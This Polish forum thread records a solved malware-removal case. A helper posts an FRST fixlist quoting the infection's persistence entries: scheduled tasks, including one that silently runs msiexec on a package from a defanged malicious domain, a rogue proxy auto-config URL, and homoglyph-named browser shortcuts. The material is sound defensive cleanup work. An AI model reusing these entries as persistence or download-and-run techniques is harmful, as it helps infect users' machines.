[Rozwiązano] Wirus wstrzymuje pracę przeglądarki i wyświetla reklamy

Witam.
Wczoraj pobrałem plik z Internetu i od tego czasu w przeglądarce włączają się reklamy i przeglądarka blokuje sie gdy wpisuje malware lub coś w tym rodzaju. Zainstalowałem adwcleaner w trybie awaryjnym i nic nadal to samo. Proszę o pomoc

Edit: Widziałem na forum podobny problem https://www.elektroda.pl/rtvforum/topic3476544.html kolega miał praktycznie taką samą sytuację co ja.

Zrób skan w trybie awaryjnym malwarebytes, pobierz program bezpośrednio z strony producenta. Dla ułatwienia proszę link:

https://data-cdn.mbamupdates.com/web/mb3-setu...etup-consumer-3.6.1.2711-1.0.482-1.0.7689.exe

W której przeglądarce to się dzieje ?Firefox,Chrome ,Opera ? No i jaki system operacyjny? XP, Vista ,7,8.1,10?

Dzieje się to w przeglądarce Opera, system operacyjny to Windows 7 skan zrobiłem zaznaczyłem aby usunęły się pliki lecz nadal dzieje się to samo. Od dawna również co kilkanaście minut wyskakuje takie okienko Dorzuciłem również skan z programu FRST.

Zrób skan programami malwarebytes anti malware i adv cleaner i będziesz miał problem z głowy.

@mati_haker infekcja blokuje pobieranie, a sam mbam nie usunie infekcji.
@CHOPIN66 wszystko masz podane w logach, po co o to pytasz?
@radex324 nie byloby tego dzialu, gdyby to bylo takie latwe.

Autor jak widac uzyl mbam, adwc, do tego ma eset i NIC sie nie zmienilo! Nie wiem po co w ogole piszecie w tym dziale...

@Diablooder
Usun recznie te wszystkie skroty z cyrylica w nazwie:
C:\Users\Mateusz\Desktop\programy\DАEМОN Toоls Litе.lnk
C:\Users\Mateusz\Desktop\programy\Firеfоx.lnk
C:\Users\Mateusz\Desktop\programy\Gоoglе Chromе.lnk
C:\Users\Mateusz\Desktop\programy\Рrzеglądаrka Opеrа.lnk
C:\Users\Mateusz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Intеrnet Exрlorеr.lnk
C:\Users\Mateusz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Roblox\Rоbloх Playеr.lnk
C:\Users\Mateusz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Intеrnеt Еxрlorеr (Nо Аdd-ons).lnk
C:\Users\Mateusz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Lаunсh Internеt Eхplorеr Вrowser.lnk
C:\Users\Mateusz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Рrzeglądаrkа Ореrа.lnk
C:\Users\Mateusz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Рrzеglądаrka Opеrа (2).lnk
C:\Users\Mateusz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Рrzеglądаrka Opеrа (3).lnk
C:\Users\Mateusz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Рrzеglądаrka Opеrа.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firеfох.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Рrzеglądаrka Орera.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ХеnохМТ2Кlient.lnk



Wykonaj Fixlist.txt dla FRST:
CloseProcesses:
CustomCLSID: HKU\S-1-5-21-1387907673-1267007590-3651194868-1000_Classes\CLSID\{162C6FB5-44D3-435B-903D-E613FA093FB5}\InprocServer32 -> C:\Users\Mateusz\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\amd64\FileCoAuthLib64.dll => Brak pliku
Task: {0A5864F0-82E0-4617-B133-472DA335A7B9} - System32\Tasks\{CCD23F48-AC0D-F2A1-ACCE-BDC8981A1D62} => C:\Program Files (x86)\Opera\Launcher.exe [2018-10-17] (Opera Software)
C:\Users\Mateusz\pkIF.exe
Task: {421A8A06-04F1-4CC8-8E68-3C0DA3BDC481} - System32\Tasks\{AEF89A9B-70F0-53BF-8E7C-24D19F298DB6} => C:\Users\Mateusz\pkIF.exe [2009-07-14] (Microsoft Corporation)
Task: {45CF52AA-2D99-4904-8306-95CEF2DE551F} - System32\Tasks\{3EE6B89D-C8CD-4FB1-A964-E100968863BE} => C:\Windows\system32\pcalua.exe -a C:\Users\Mateusz\AppData\Local\Temp\Temp1_USB3_Etron_Win7-64_Win7_Vista64_Vista_XP64_XP(v0.96_WHQL).zip\USB3(v0.96_WHQL)\setup.exe <==== UWAGA
Task: {709A3AA5-49FE-4DA2-A6D8-5D280148A3F1} - System32\Tasks\{39B157F7-D329-488A-8362-1C3520D00532} => C:\Windows\system32\pcalua.exe -a C:\Users\Mateusz\Downloads\Terraria.v1.3.5.3\_Redist\vcredist_x86.exe -d C:\Users\Mateusz\Downloads\Terraria.v1.3.5.3\_Redist
Task: {774F02AA-2BC6-41FF-9A14-872C470E46EB} - System32\Tasks\{5CBF053F-6E7B-4F07-B9F4-2CC836BED608} => C:\Windows\system32\pcalua.exe -a C:\Users\Mateusz\AppData\Local\Temp\jre-8u191-windows-au.exe -d C:\Windows\SysWOW64 -c /installmethod=jau FAMILYUPGRADE=1 <==== UWAGA
Task: {8DA731E6-2157-47FD-8712-1E0A814B7A83} - System32\Tasks\Opera scheduled Autoupdate 1509383942 => C:\Program Files (x86)\Opera\launcher.exe [2018-10-17] (Opera Software)
Task: {C669F41F-9F2B-494E-9B47-8A3A3DF7C417} - System32\Tasks\Opera scheduled Autoupdate 410608298 => C:\Windows\system32\cmd.exe /c start "" "C:\Users\Mateusz\AppData\Roaming\Microsoft\Windows\tbuabuiv\tiuehdra.exe"
Task: {DE895362-8895-4A3E-B5CE-124CE5C1F05C} - System32\Tasks\{E7295CDE-25C5-A893-8386-61D3F80AAD95} => "msiexec" -q -i hxxps://siamoderg.info/e3ijjz6wc35e.iio
C:\Users\Mateusz\Desktop\programy\DАEМОN Toоls Litе.lnk
C:\Users\Mateusz\Desktop\programy\Firеfоx.lnk
C:\Users\Mateusz\Desktop\programy\Gоoglе Chromе.lnk
C:\Users\Mateusz\Desktop\programy\Рrzеglądаrka Opеrа.lnk
C:\Users\Mateusz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Intеrnet Exрlorеr.lnk
C:\Users\Mateusz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Roblox\Rоbloх Playеr.lnk
C:\Users\Mateusz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Intеrnеt Еxрlorеr (Nо Аdd-ons).lnk
C:\Users\Mateusz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Lаunсh Internеt Eхplorеr Вrowser.lnk
C:\Users\Mateusz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Рrzeglądаrkа Ореrа.lnk
C:\Users\Mateusz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Рrzеglądаrka Opеrа (2).lnk
C:\Users\Mateusz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Рrzеglądаrka Opеrа (3).lnk
C:\Users\Mateusz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Рrzеglądаrka Opеrа.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firеfох.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Рrzеglądаrka Орera.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ХеnохМТ2Кlient.lnk
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT [40]
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT2 [812]
AlternateDataStreams: C:\Users\Mateusz\Dane aplikacji:NT [40]
AlternateDataStreams: C:\Users\Mateusz\Dane aplikacji:NT2 [812]
AlternateDataStreams: C:\Users\Mateusz\AppData\Roaming:NT [40]
AlternateDataStreams: C:\Users\Mateusz\AppData\Roaming:NT2 [812]
AlternateDataStreams: C:\Users\Public\AppData:CSM [468]
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [466]
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-1387907673-1267007590-3651194868-1000\...\MountPoints2: {1010ee8a-c09e-11e7-841a-ac80674f8c48} - I:\Ret.exe
HKU\S-1-5-21-1387907673-1267007590-3651194868-1000\...\MountPoints2: {bf888a19-bfe2-11e7-82ef-c5e0c792f147} - G:\Install.exe
HKU\S-1-5-21-1387907673-1267007590-3651194868-1000\...\MountPoints2: {bf888a4c-bfe2-11e7-82ef-c5e0c792f147} - H:\setup.exe
HKU\S-1-5-21-1387907673-1267007590-3651194868-1000\...\Winlogon: [Shell] C:\Windows\explorer.exe [3229696 2016-08-29] (Microsoft Corporation) <==== UWAGA
AutoConfigURL: [.DEFAULT] => hxxp://unstop-access.org/wpad.dat?be8c43f9cf682835df5a1b93f6c5cc5038497971
SearchScopes: HKLM-x32 -> DefaultScope - brak wartości
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\root\Office16\URLREDIR.DLL => Brak pliku
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll => Brak pliku
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\URLREDIR.DLL => Brak pliku
Handler: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL Brak pliku
Handler: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL Brak pliku
Handler: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL Brak pliku
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL Brak pliku
Filter: text/xml - {807583E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLMF.DLL Brak pliku
C:\Users\Mateusz\AppData\Local\Google\Chrome\User Data\Default\Extensions\gpabpfikknflecblchhfkpkcpilbkfcd
CHR Extension: (MyJSCript) - C:\Users\Mateusz\AppData\Local\Google\Chrome\User Data\Default\Extensions\gpabpfikknflecblchhfkpkcpilbkfcd [2018-11-03]
C:\Users\Mateusz\AppData\Roaming\Opera Software\Opera Stable\Extensions\deofbbdfofnmppcjbhjibgodpcdchjii
OPR Extension: (BetterTTV) - C:\Users\Mateusz\AppData\Roaming\Opera Software\Opera Stable\Extensions\deofbbdfofnmppcjbhjibgodpcdchjii [2018-06-06]
S2 HiPatchService; D:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe [X]
S2 WinDivert1.2; C:\Windows\system32\drivers\WinDivert64.sys [37552 2018-03-27] (Basil)
S3 FairplayKD; \??\C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys [X]
S2 WinRing0_1_2_0; \??\D:\Program Files (x86)\Steam\steamapps\common\EVGA PrecisionX\WinRing0\WinRing0x64.sys [X]
2018-11-05 02:10 - 2018-11-05 02:10 - 000388608 _____ (Trend Micro Inc.) C:\Users\Mateusz\Desktop\HijackThis_2.0.4.exe
2018-11-03 22:36 - 2018-11-03 22:36 - 000003738 _____ C:\Windows\System32\Tasks\{CCD23F48-AC0D-F2A1-ACCE-BDC8981A1D62}
2018-11-03 22:36 - 2018-11-03 22:36 - 000003628 _____ C:\Windows\System32\Tasks\{AEF89A9B-70F0-53BF-8E7C-24D19F298DB6}
2018-11-03 22:36 - 2018-11-03 22:36 - 000003380 _____ C:\Windows\System32\Tasks\{E7295CDE-25C5-A893-8386-61D3F80AAD95}
2018-11-03 22:36 - 2018-11-03 22:36 - 000000002 _____ C:\Users\Mateusz\AppData\Local\imw.ini
2018-10-25 22:22 - 2018-10-25 22:22 - 000003254 _____ C:\Windows\System32\Tasks\{5CBF053F-6E7B-4F07-B9F4-2CC836BED608}
2018-11-04 13:12 - 2017-08-23 17:37 - 000000000 ____D C:\AdwCleaner
2018-10-18 13:59 - 2018-05-24 14:40 - 000003902 _____ C:\Windows\System32\Tasks\Opera scheduled Autoupdate 1509383942
2009-07-14 02:14 - 2009-07-14 02:14 - 000073216 ____N (Microsoft Corporation) C:\Users\Mateusz\pkIF.exe
2009-07-14 02:14 - 2009-07-14 02:14 - 000186368 ____N (Microsoft Corporation) C:\Users\Mateusz\AppData\Roaming\kIPYWoOeSoGSp.exe
2018-03-27 21:25 - 2018-03-27 21:25 - 000000059 _____ () C:\Users\Mateusz\AppData\Roaming\~SiMPLEX.ini
2018-11-03 22:36 - 2018-11-03 22:36 - 000000002 _____ () C:\Users\Mateusz\AppData\Local\imw.ini
2018-03-27 22:10 - 2018-03-27 22:10 - 000140800 _____ () C:\Users\Mateusz\AppData\Local\installer.dat

Po wykonaniu usun katalog C:\FRST i to wszystko.

Po wykonaniu fixlisty wszystko śmiga. Wielkie dzięki za pomoc.